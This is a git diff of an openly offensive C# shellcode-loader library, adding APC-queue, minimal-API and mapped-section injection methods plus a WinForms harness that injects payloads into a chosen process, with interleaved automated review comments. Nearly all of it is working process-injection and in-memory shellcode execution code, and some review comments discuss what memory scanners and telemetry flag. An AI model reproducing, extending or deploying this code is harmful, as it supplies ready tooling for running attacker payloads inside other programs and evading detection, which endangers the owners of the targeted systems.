diff --git a/PayloadCSharp/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/PayloadCSharp/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
index f7f15e4..5dfb61c 100644
Binary files a/PayloadCSharp/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/PayloadCSharp/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/ShellCodeLoader/MapView.cs b/ShellCodeLoader/MapView.cs
index ba470c9..9c6c006 100644
--- a/ShellCodeLoader/MapView.cs
+++ b/ShellCodeLoader/MapView.cs
@@ -45,6 +45,7 @@ private void NtMapView()
UInt64 localOffset = 0;
Imports.NtMapViewOfSection(hSectionHandle, Process.GetCurrentProcess().Handle, ref pLocalView, UIntPtr.Zero, UIntPtr.Zero, ref localOffset, ref RegionSize, Imports.VIEWUNMAP, 0, PageProtection.PAGE_READWRITE);
+
UInt64 remoteOffset = 0;
IntPtr pRemoteView = IntPtr.Zero;
Imports.NtMapViewOfSection(hSectionHandle, Target.Handle, ref pRemoteView, UIntPtr.Zero, UIntPtr.Zero, ref remoteOffset, ref RegionSize, Imports.VIEWUNMAP, 0, PageProtection.PAGE_EXECUTE_READ);
diff --git a/ShellCodeLoader/QueueAPC.cs b/ShellCodeLoader/QueueAPC.cs
new file mode 100644
index 0000000..ff4cf10
--- /dev/null
+++ b/ShellCodeLoader/QueueAPC.cs
@@ -0,0 +1,133 @@
+using Microsoft.Win32.SafeHandles;
+using System;
+using System.Diagnostics;
+using System.Runtime.InteropServices;
+using System.Threading;
+using static ShellCodeLoader.Shared;
+/*
+|| AUTHOR Arsium ||
+|| github : https://github.com/arsium ||
+|| Please let this credit for all the time I worked on ||
+|| Guide & Inspirations : https://www.ired.team/offensive-security/code-injection-process-injection/apc-queue-code-injection
+*/
+namespace ShellCodeLoader
+{
+ public class QueueAPC : IDisposable
+ {
+
+ private byte[] ShellCode;
+ private uint RegionSize;
+ private Process Target;
+ private bool NewThread;
+
+ public QueueAPC(byte[] shellCode, bool newThread = false)
+ {
+ this.ShellCode = shellCode;
+ this.RegionSize = (uint)shellCode.Length;
+ this.Target = Process.GetCurrentProcess();
+ this.NewThread = newThread;
+ }
+ private unsafe void CallBackQueueUserAPC(void* param)
+ {
+ IntPtr ptr = Imports.VirtualAllocEx(Target.Handle, IntPtr.Zero, (IntPtr)ShellCode.Length, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, Shared.PageProtection.PAGE_EXECUTE_READWRITE);
+
+ UIntPtr writtenBytes;
+ Imports.WriteProcessMemory(Target.Handle, ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
+
+ PageProtection flOld;
+ Imports.VirtualProtect(ptr, RegionSize, PageProtection.PAGE_EXECUTE_READWRITE, out flOld);
+
+ ShellCodeCaller s = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
+ s();
+ }
+
+ private unsafe void QueueUserAPC()
+ {
+ if (NewThread)
+ {
+ new Thread(() =>
+ {
+ //https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-queueuserapc
+ Imports.CallBack s = new Imports.CallBack(CallBackQueueUserAPC); //set our callback for APC (the callback is a classic shellcode loader
+
+ Imports.QueueUserAPC(s, Imports.GetCurrentThread(), IntPtr.Zero); //add apc to our thread
+
+ //Imports.SleepEx(0, true); //now we have to set an alertable for our thread : https://docs.microsoft.com/en-us/windows/win32/sync/asynchronous-procedure-calls
+ Imports.NtTestAlert(); //empty APC queue for the current thread
+
+ }).Start();
+ }
+ else
+ {
+ //https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-queueuserapc
+ Imports.CallBack s = new Imports.CallBack(CallBackQueueUserAPC); //set our callback for APC (the callback is a classic shellcode loader
+
+ Imports.QueueUserAPC(s, Imports.GetCurrentThread(), IntPtr.Zero); //add apc to our thread
+
+ //Imports.SleepEx(0, true); //now we have to set an alertable for our thread : https://docs.microsoft.com/en-us/windows/win32/sync/asynchronous-procedure-calls
+ Imports.NtTestAlert(); //empty APC queue for the current thread
+ }
+ }
+
+ public void LoadWithQueueAPC()
+ {
+ QueueUserAPC();
+ }
+
+ private static class Imports
+ {
+ internal const String KERNEL32 = "kernel32.dll";
+ internal const String NTDLL = "ntdll.dll";
+
+
+ public unsafe delegate void CallBack(void* param);
+ public delegate void ShellCodeCaller();
+
+
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static unsafe extern uint QueueUserAPC(CallBack pFunction, IntPtr tHandle, IntPtr dwData);
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static unsafe extern uint SleepEx(uint dwMilliseconds, bool bAlertable);
+ [DllImport(NTDLL, SetLastError = true)]
+ public static extern uint NtTestAlert();
+
+
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, UIntPtr nSize, out UIntPtr lpNumberOfBytesWritten);
+
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern IntPtr VirtualAllocEx(IntPtr procHandle, IntPtr address, IntPtr numBytes, Shared.TypeAlloc commitOrReserve, Shared.PageProtection pageProtectionMode);
+
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, Shared.PageProtection flNewProtect, out Shared.PageProtection lpflOldProtect);
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern IntPtr GetCurrentThread();
+ }
+
+ private bool _disposed = false;
+
+ // Instantiate a SafeHandle instance.
+ private SafeHandle _safeHandle = new SafeFileHandle(IntPtr.Zero, true);
+
+ // Public implementation of Dispose pattern callable by consumers.
+ public void Dispose() => Dispose(true);
+
+ // Protected implementation of Dispose pattern.
+ protected virtual void Dispose(bool disposing)
+ {
+ if (_disposed)
+ {
+ return;
+ }
+
+ if (disposing)
+ {
+ // Dispose managed state (managed objects).
+ _safeHandle?.Dispose();
+ }
+
+ _disposed = true;
+ GC.SuppressFinalize(this);
+ }
+ }
+}
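Review bot: The `VirtualProtect` call in `CallBackQueueUserAPC` re-applies `PAGE_EXECUTE_READWRITE` to a region that `VirtualAllocEx` already committed with that same protection, so it changes nothing, and `flOld` and `writtenBytes` are never read. The region therefore stays writable and executable, which is the private RWX mapping that memory scanners and allocation telemetry flag, and no API result is checked before the delegate is invoked on `ptr`. `Dispose` only disposes a `SafeFileHandle` over `IntPtr.Zero` and the file imports no free routine, so nothing allocated here is released. I would record that at the top of the method, e.g. `// NOTE: region stays RWX and is never freed; API return values are not checked`, and either drop the redundant call or check its result.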
diff --git a/ShellCodeLoader/Shared.cs b/ShellCodeLoader/Shared.cs
index 388361f..c307b99 100644
--- a/ShellCodeLoader/Shared.cs
+++ b/ShellCodeLoader/Shared.cs
@@ -1,15 +1,19 @@
using System;
+using System.Runtime.InteropServices;
/*
|| AUTHOR Arsium ||
|| github : https://github.com/arsium ||
|| Please let this credit for all the time I worked on ||
- */
+*/
namespace ShellCodeLoader
{
internal class Shared
{
+ [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+ internal delegate void ShellCodeCaller();
+
[Flags]
- public enum TypeAlloc : uint
+ internal enum TypeAlloc : uint
{
MEM_COMMIT = 0x00001000,
MEM_RESERVE = 0x00002000,
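Review bot: Moving `ShellCodeCaller` into `Shared` leaves two declarations of that name in this commit, because the new `QueueAPC.cs` also declares `public delegate void ShellCodeCaller();` inside its private `Imports` class, without `[UnmanagedFunctionPointer(CallingConvention.StdCall)]`. The unqualified use in `CallBackQueueUserAPC` appears to bind to this shared one through `using static ShellCodeLoader.Shared`, so the copy in `Imports` looks unused and could be deleted to avoid two delegates that differ in calling-convention metadata. A one-line `///` summary here saying the delegate wraps a raw function pointer to caller-supplied bytes would also help a reader. The `TypeAlloc` enum body continues outside this hunk.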
@@ -22,7 +26,7 @@ public enum TypeAlloc : uint
}
[Flags]
- public enum FreeType : uint
+ internal enum FreeType : uint
{
MEM_DECOMMIT = 0x00004000,
MEM_RELEASE = 0x00008000,
@@ -31,7 +35,7 @@ public enum FreeType : uint
}
[Flags]
- public enum PageProtection : uint
+ internal enum PageProtection : uint
{
PAGE_EXECUTE = 0x10,
PAGE_EXECUTE_READ = 0x20,
@@ -49,7 +53,7 @@ public enum PageProtection : uint
}
[Flags]
- public enum AccessMask : uint
+ internal enum AccessMask : uint
{
GENERIC_READ = 0x80000000,
GENERIC_WRITE = 0x40000000,
diff --git a/ShellCodeLoader/ShellCodeLoader.cs b/ShellCodeLoader/ShellCodeLoader.cs
index ea3e973..d995fa3 100644
--- a/ShellCodeLoader/ShellCodeLoader.cs
+++ b/ShellCodeLoader/ShellCodeLoader.cs
@@ -22,9 +22,6 @@ public class ShellCodeLoader : IDisposable
///
public bool Asynchronous { get; set; }
- [UnmanagedFunctionPointer(CallingConvention.StdCall)]
- private delegate void ShellCodeCaller();
-
public ShellCodeLoader(byte[] shellCode)
{
this.ShellCode = shellCode;
@@ -89,25 +86,33 @@ public void LoadWithKernel32Delegates()
private void NT()
{
- Imports.NtAllocateVirtualMemory(Imports.GetCurrentProcess(), ref ptr, IntPtr.Zero, ref RegionSize, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, PageProtection.PAGE_EXECUTE_READWRITE);
+ Imports.NtAllocateVirtualMemory(Imports.GetCurrentProcess(), ref ptr, IntPtr.Zero, ref RegionSize, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, PageProtection.PAGE_EXECUTE_READWRITE);
+
UIntPtr bytesWritten;
- Imports.NtWriteVirtualMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out bytesWritten);
+ Imports.NtWriteVirtualMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out bytesWritten);
+
PageProtection flOld = new PageProtection();
- Imports.NtProtectVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, PageProtection.PAGE_EXECUTE_READ, ref flOld);
+ Imports.NtProtectVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, PageProtection.PAGE_EXECUTE_READ, ref flOld);
+
ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
load();
+
Imports.NtFreeVirtualMemory(Imports.GetCurrentProcess(), ref ptr, ref RegionSize, FreeType.MEM_RELEASE);
}
private void Kernel32()
{
- this.ptr = Imports.VirtualAlloc(IntPtr.Zero, (IntPtr)ShellCode.Length, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, PageProtection.PAGE_EXECUTE_READWRITE);
+ this.ptr = Imports.VirtualAlloc(IntPtr.Zero, (IntPtr)ShellCode.Length, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, PageProtection.PAGE_EXECUTE_READWRITE);
+
UIntPtr writtenBytes;
- Imports.WriteProcessMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
+ Imports.WriteProcessMemory(Imports.GetCurrentProcess(), ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
+
PageProtection flOld;
- Imports.VirtualProtect(ptr, RegionSize, PageProtection.PAGE_EXECUTE_READ, out flOld);
+ Imports.VirtualProtect(ptr, RegionSize, PageProtection.PAGE_EXECUTE_READ, out flOld);
+
ShellCodeCaller load = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer(ptr, typeof(ShellCodeCaller));
load();
+
Imports.VirtualFree(ptr, (uint)0, FreeType.MEM_RELEASE);
}
diff --git a/ShellCodeLoader/ShellCodeLoader.csproj b/ShellCodeLoader/ShellCodeLoader.csproj
index 8e345b4..949dc02 100644
--- a/ShellCodeLoader/ShellCodeLoader.csproj
+++ b/ShellCodeLoader/ShellCodeLoader.csproj
@@ -56,10 +56,12 @@
+
+
\ No newline at end of file
diff --git a/ShellCodeLoader/ShellCodeLoaderEx.cs b/ShellCodeLoader/ShellCodeLoaderEx.cs
index 3330bd4..b605fde 100644
--- a/ShellCodeLoader/ShellCodeLoaderEx.cs
+++ b/ShellCodeLoader/ShellCodeLoaderEx.cs
@@ -39,9 +39,12 @@ private void NT()
{
Imports.NtAllocateVirtualMemory(Target.Handle, ref ptr, IntPtr.Zero, ref RegionSize, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, PageProtection.PAGE_EXECUTE_READWRITE);
UIntPtr bytesWritten;
+
Imports.NtWriteVirtualMemory(Target.Handle, ptr, ShellCode, (UIntPtr)ShellCode.Length, out bytesWritten);
+
PageProtection flOld = new PageProtection();
Imports.NtProtectVirtualMemory(Target.Handle, ref ptr, ref RegionSize, PageProtection.PAGE_EXECUTE_READ, ref flOld);
+
IntPtr hThread = IntPtr.Zero;
Imports.NtCreateThreadEx(ref hThread, AccessMask.GENERIC_EXECUTE, IntPtr.Zero, Target.Handle, ptr, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);
//
@@ -52,10 +55,13 @@ private void NT()
private void Kernel32()
{
this.ptr = Imports.VirtualAllocEx(Target.Handle, IntPtr.Zero, (IntPtr)ShellCode.Length, TypeAlloc.MEM_COMMIT | TypeAlloc.MEM_RESERVE, PageProtection.PAGE_EXECUTE_READWRITE);
+
UIntPtr writtenBytes;
Imports.WriteProcessMemory(Target.Handle, ptr, ShellCode, (UIntPtr)ShellCode.Length, out writtenBytes);
+
PageProtection flOld;
Imports.VirtualProtectEx(Target.Handle, ptr, RegionSize, PageProtection.PAGE_EXECUTE_READ, out flOld);
+
IntPtr hThread = Imports.CreateRemoteThread(Target.Handle, IntPtr.Zero, 0, ptr, IntPtr.Zero, Imports.ThreadCreationFlags.NORMAL, out hThread);
}
diff --git a/ShellCodeLoader/ShellCodeLoaderMinimalNativeAPI.cs b/ShellCodeLoader/ShellCodeLoaderMinimalNativeAPI.cs
new file mode 100644
index 0000000..6fe3be3
--- /dev/null
+++ b/ShellCodeLoader/ShellCodeLoaderMinimalNativeAPI.cs
@@ -0,0 +1,83 @@
+using Microsoft.Win32.SafeHandles;
+using System;
+using System.Runtime.InteropServices;
+using System.Threading;
+using System.Threading.Tasks;
+using static ShellCodeLoader.Shared;
+
+namespace ShellCodeLoader
+{
+ public class ShellCodeLoaderMinimalNativeAPI : IDisposable
+ {
+ private byte[] ShellCode;
+ private uint RegionSize;
+ ///
+ /// Default is false.
+ ///
+ public bool Asynchronous { get; set; }
+
+
+ public ShellCodeLoaderMinimalNativeAPI(byte[] shellCode)
+ {
+ this.ShellCode = shellCode;
+ this.RegionSize = (uint)shellCode.Length;
+ this.Asynchronous = false;
+ }
+
+ public void LoadWithMinimalAPI()
+ {
+ if (this.Asynchronous)
+ {
+ Task.Factory.StartNew(() => { MinimalAPI(); }, CancellationToken.None, TaskCreationOptions.None, TaskScheduler.Default);
+ }
+ else
+ {
+ MinimalAPI();
+ }
+ }
+ private unsafe void MinimalAPI()
+ {
+ fixed(void* ptr = &this.ShellCode[0])
+ {
+ PageProtection flOld;
+ Imports.VirtualProtect((IntPtr)ptr, RegionSize, Shared.PageProtection.PAGE_EXECUTE_READWRITE, out flOld);
+
+ ShellCodeCaller s = (ShellCodeCaller)Marshal.GetDelegateForFunctionPointer((IntPtr)ptr, typeof(ShellCodeCaller));
+ s();
+ }
+ }
+ internal static class Imports
+ {
+
+ internal const String KERNEL32 = "kernel32.dll";
+ [DllImport(KERNEL32, SetLastError = true, ExactSpelling = true, CharSet = CharSet.Auto, CallingConvention = CallingConvention.StdCall)]
+ public static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, Shared.PageProtection flNewProtect, out Shared.PageProtection lpflOldProtect);
+ }
+
+ private bool _disposed = false;
+
+ // Instantiate a SafeHandle instance.
+ private SafeHandle _safeHandle = new SafeFileHandle(IntPtr.Zero, true);
+
+ // Public implementation of Dispose pattern callable by consumers.
+ public void Dispose() => Dispose(true);
+
+ // Protected implementation of Dispose pattern.
+ protected virtual void Dispose(bool disposing)
+ {
+ if (_disposed)
+ {
+ return;
+ }
+
+ if (disposing)
+ {
+ // Dispose managed state (managed objects).
+ _safeHandle?.Dispose();
+ }
+
+ _disposed = true;
+ GC.SuppressFinalize(this);
+ }
+ }
+}
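Review bot: `MinimalAPI` changes page protection on the managed heap itself, and nothing in the file says so. `VirtualProtect` works on whole pages, so every page that holds part of the pinned `ShellCode` array becomes `PAGE_EXECUTE_READWRITE` along with whatever other managed objects share those pages. `flOld` is never used to restore the protection and the call's `bool` result is ignored before the delegate is invoked. Executable pages inside the GC heap are unusual enough to be worth a comment such as `// VirtualProtect is page-granular: neighbouring managed objects become RWX too and flOld is never restored`. `&this.ShellCode[0]` also throws on an empty array, so the constructor could reject `shellCode == null || shellCode.Length == 0` with an `ArgumentException`.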
diff --git a/ShellCodeLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/ShellCodeLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
index 90de0fd..7494a0d 100644
Binary files a/ShellCodeLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/ShellCodeLoader/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.AssemblyReference.cache b/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.AssemblyReference.cache
index 4f18f8f..204fdef 100644
Binary files a/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.AssemblyReference.cache and b/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.AssemblyReference.cache differ
diff --git a/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache b/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
index 209fbb4..c245c3c 100644
--- a/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
+++ b/ShellCodeLoader/obj/Release/ShellCodeLoader.csproj.CoreCompileInputs.cache
@@ -1 +1 @@
-b025bf862b326d406604d35fe513ad97e74800ce
+d13612e3ee84b59d0abdaff95468991f181618fb
diff --git a/ShellCodeLoader/obj/Release/ShellCodeLoader.dll b/ShellCodeLoader/obj/Release/ShellCodeLoader.dll
index 750feb2..58efb2a 100644
Binary files a/ShellCodeLoader/obj/Release/ShellCodeLoader.dll and b/ShellCodeLoader/obj/Release/ShellCodeLoader.dll differ
diff --git a/Test/Form1.Designer.cs b/Test/Form1.Designer.cs
index 280606d..8fbceda 100644
--- a/Test/Form1.Designer.cs
+++ b/Test/Form1.Designer.cs
@@ -39,9 +39,11 @@ private void InitializeComponent()
this.columnHeader2 = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader()));
this.contextMenuStrip1 = new System.Windows.Forms.ContextMenuStrip(this.components);
this.injectToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.injectWithMapViewToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.refreshToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
this.button5 = new System.Windows.Forms.Button();
- this.injectWithMapViewToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem();
+ this.button6 = new System.Windows.Forms.Button();
+ this.button7 = new System.Windows.Forms.Button();
this.contextMenuStrip1.SuspendLayout();
this.SuspendLayout();
//
@@ -114,19 +116,26 @@ private void InitializeComponent()
this.injectWithMapViewToolStripMenuItem,
this.refreshToolStripMenuItem});
this.contextMenuStrip1.Name = "contextMenuStrip1";
- this.contextMenuStrip1.Size = new System.Drawing.Size(184, 92);
+ this.contextMenuStrip1.Size = new System.Drawing.Size(184, 70);
//
// injectToolStripMenuItem
//
this.injectToolStripMenuItem.Name = "injectToolStripMenuItem";
- this.injectToolStripMenuItem.Size = new System.Drawing.Size(113, 22);
+ this.injectToolStripMenuItem.Size = new System.Drawing.Size(183, 22);
this.injectToolStripMenuItem.Text = "Inject";
this.injectToolStripMenuItem.Click += new System.EventHandler(this.injectToolStripMenuItem_Click);
//
+ // injectWithMapViewToolStripMenuItem
+ //
+ this.injectWithMapViewToolStripMenuItem.Name = "injectWithMapViewToolStripMenuItem";
+ this.injectWithMapViewToolStripMenuItem.Size = new System.Drawing.Size(183, 22);
+ this.injectWithMapViewToolStripMenuItem.Text = "Inject With MapView";
+ this.injectWithMapViewToolStripMenuItem.Click += new System.EventHandler(this.injectWithMapViewToolStripMenuItem_Click);
+ //
// refreshToolStripMenuItem
//
this.refreshToolStripMenuItem.Name = "refreshToolStripMenuItem";
- this.refreshToolStripMenuItem.Size = new System.Drawing.Size(113, 22);
+ this.refreshToolStripMenuItem.Size = new System.Drawing.Size(183, 22);
this.refreshToolStripMenuItem.Text = "Refresh";
this.refreshToolStripMenuItem.Click += new System.EventHandler(this.refreshToolStripMenuItem_Click);
//
@@ -140,18 +149,33 @@ private void InitializeComponent()
this.button5.UseVisualStyleBackColor = true;
this.button5.Click += new System.EventHandler(this.button5_Click);
//
- // injectWithMapViewToolStripMenuItem
+ // button6
//
- this.injectWithMapViewToolStripMenuItem.Name = "injectWithMapViewToolStripMenuItem";
- this.injectWithMapViewToolStripMenuItem.Size = new System.Drawing.Size(183, 22);
- this.injectWithMapViewToolStripMenuItem.Text = "Inject With MapView";
- this.injectWithMapViewToolStripMenuItem.Click += new System.EventHandler(this.injectWithMapViewToolStripMenuItem_Click);
+ this.button6.Location = new System.Drawing.Point(294, 89);
+ this.button6.Name = "button6";
+ this.button6.Size = new System.Drawing.Size(121, 59);
+ this.button6.TabIndex = 6;
+ this.button6.Text = "Local QueueAPC";
+ this.button6.UseVisualStyleBackColor = true;
+ this.button6.Click += new System.EventHandler(this.button6_Click);
+ //
+ // button7
+ //
+ this.button7.Location = new System.Drawing.Point(436, 12);
+ this.button7.Name = "button7";
+ this.button7.Size = new System.Drawing.Size(121, 59);
+ this.button7.TabIndex = 7;
+ this.button7.Text = "Minimal API";
+ this.button7.UseVisualStyleBackColor = true;
+ this.button7.Click += new System.EventHandler(this.button7_Click);
//
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
- this.ClientSize = new System.Drawing.Size(493, 415);
+ this.ClientSize = new System.Drawing.Size(569, 356);
+ this.Controls.Add(this.button7);
+ this.Controls.Add(this.button6);
this.Controls.Add(this.button5);
this.Controls.Add(this.listView1);
this.Controls.Add(this.button4);
@@ -179,6 +203,8 @@ private void InitializeComponent()
private System.Windows.Forms.ToolStripMenuItem refreshToolStripMenuItem;
private System.Windows.Forms.Button button5;
private System.Windows.Forms.ToolStripMenuItem injectWithMapViewToolStripMenuItem;
+ private System.Windows.Forms.Button button6;
+ private System.Windows.Forms.Button button7;
}
}
diff --git a/Test/Form1.cs b/Test/Form1.cs
index 2289388..885bbb4 100644
--- a/Test/Form1.cs
+++ b/Test/Form1.cs
@@ -164,6 +164,29 @@ private void button5_Click(object sender, EventArgs e)
}
}
+
+ private void button6_Click(object sender, EventArgs e)
+ {
+ if (IntPtr.Size == 8)
+ {
+ ShellCodeLoader.QueueAPC cpp = new ShellCodeLoader.QueueAPC(PayloadCpp64.rawData);
+ ShellCodeLoader.QueueAPC csharp = new ShellCodeLoader.QueueAPC(PayloadCSharp64.rawData, true);
+ cpp.LoadWithQueueAPC();
+ csharp.LoadWithQueueAPC();
+ cpp.Dispose();
+ csharp.Dispose();
+ }
+ else
+ {
+ ShellCodeLoader.QueueAPC cpp = new ShellCodeLoader.QueueAPC(PayloadCpp32.rawData, true);
+ ShellCodeLoader.QueueAPC csharp = new ShellCodeLoader.QueueAPC(PayloadCSharp32.rawData, true);
+ cpp.LoadWithQueueAPC();
+ csharp.LoadWithQueueAPC();
+ cpp.Dispose();
+ csharp.Dispose();
+ }
+ }
+
private void injectWithMapViewToolStripMenuItem_Click(object sender, EventArgs e)
{
Process Target = Process.GetProcessesByName(listView1.SelectedItems[0].SubItems[1].Text)[0];
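Review bot: The two architecture branches of `button6_Click` do not configure the loaders the same way: the 64-bit branch builds `cpp` with `new ShellCodeLoader.QueueAPC(PayloadCpp64.rawData)` (so `newThread` is false), while the 32-bit branch passes `true` for both objects. The next hunk's `button7_Click` has the same asymmetry, setting `Asynchronous = true` only when `IntPtr.Size == 8`. If the difference is intended, a short comment on each branch should say why; otherwise the arguments should match. Both handlers also call `Dispose()` immediately after starting work that may still be running on another thread, which is harmless only while `Dispose` releases nothing, so `using` blocks plus a comment on that assumption would be clearer. `injectWithMapViewToolStripMenuItem_Click` continues outside this hunk.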
@@ -174,5 +197,29 @@ private void injectWithMapViewToolStripMenuItem_Click(object sender, EventArgs e
cpp.Dispose();
csharp.Dispose();
}
+
+ private void button7_Click(object sender, EventArgs e)
+ {
+ if (IntPtr.Size == 8)
+ {
+ ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI cpp = new ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI(PayloadCpp64.rawData);
+ ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI csharp = new ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI(PayloadCSharp64.rawData);
+ cpp.Asynchronous = true;
+ csharp.Asynchronous = true;
+ cpp.LoadWithMinimalAPI();
+ csharp.LoadWithMinimalAPI();
+ cpp.Dispose();
+ csharp.Dispose();
+ }
+ else
+ {
+ ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI cpp = new ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI(PayloadCpp32.rawData);
+ ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI csharp = new ShellCodeLoader.ShellCodeLoaderMinimalNativeAPI(PayloadCSharp32.rawData);
+ cpp.LoadWithMinimalAPI();
+ csharp.LoadWithMinimalAPI();
+ cpp.Dispose();
+ csharp.Dispose();
+ }
+ }
}
}
diff --git a/Test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/Test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
index 72ba5b5..c7f583d 100644
Binary files a/Test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/Test/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/Test/obj/Release/DesignTimeResolveAssemblyReferences.cache b/Test/obj/Release/DesignTimeResolveAssemblyReferences.cache
index 29e521b..85eb605 100644
Binary files a/Test/obj/Release/DesignTimeResolveAssemblyReferences.cache and b/Test/obj/Release/DesignTimeResolveAssemblyReferences.cache differ
diff --git a/Test/obj/Release/Test.csproj.GenerateResource.cache b/Test/obj/Release/Test.csproj.GenerateResource.cache
index 9b03a0a..c3cddc7 100644
Binary files a/Test/obj/Release/Test.csproj.GenerateResource.cache and b/Test/obj/Release/Test.csproj.GenerateResource.cache differ
diff --git a/Test/obj/Release/Test.exe b/Test/obj/Release/Test.exe
index b6a37ab..b3a968d 100644
Binary files a/Test/obj/Release/Test.exe and b/Test/obj/Release/Test.exe differ
diff --git a/Test/obj/Release/Test.pdb b/Test/obj/Release/Test.pdb
index 897a0c6..7627cb5 100644
Binary files a/Test/obj/Release/Test.pdb and b/Test/obj/Release/Test.pdb differ
diff --git a/Test/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache b/Test/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache
index ba952a2..ebca0dd 100644
Binary files a/Test/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache and b/Test/obj/x64/Release/DesignTimeResolveAssemblyReferencesInput.cache differ
diff --git a/Test/obj/x64/Release/Test.csproj.AssemblyReference.cache b/Test/obj/x64/Release/Test.csproj.AssemblyReference.cache
index 204fdef..6a3d9da 100644
Binary files a/Test/obj/x64/Release/Test.csproj.AssemblyReference.cache and b/Test/obj/x64/Release/Test.csproj.AssemblyReference.cache differ
diff --git a/Test/obj/x64/Release/Test.csproj.GenerateResource.cache b/Test/obj/x64/Release/Test.csproj.GenerateResource.cache
index 9b03a0a..c3cddc7 100644
Binary files a/Test/obj/x64/Release/Test.csproj.GenerateResource.cache and b/Test/obj/x64/Release/Test.csproj.GenerateResource.cache differ
diff --git a/Test/obj/x64/Release/Test.exe b/Test/obj/x64/Release/Test.exe
index 3b9a6da..0068aa3 100644
Binary files a/Test/obj/x64/Release/Test.exe and b/Test/obj/x64/Release/Test.exe differ
diff --git a/Test/obj/x64/Release/Test.pdb b/Test/obj/x64/Release/Test.pdb
index 343309c..ac186c4 100644
Binary files a/Test/obj/x64/Release/Test.pdb and b/Test/obj/x64/Release/Test.pdb differ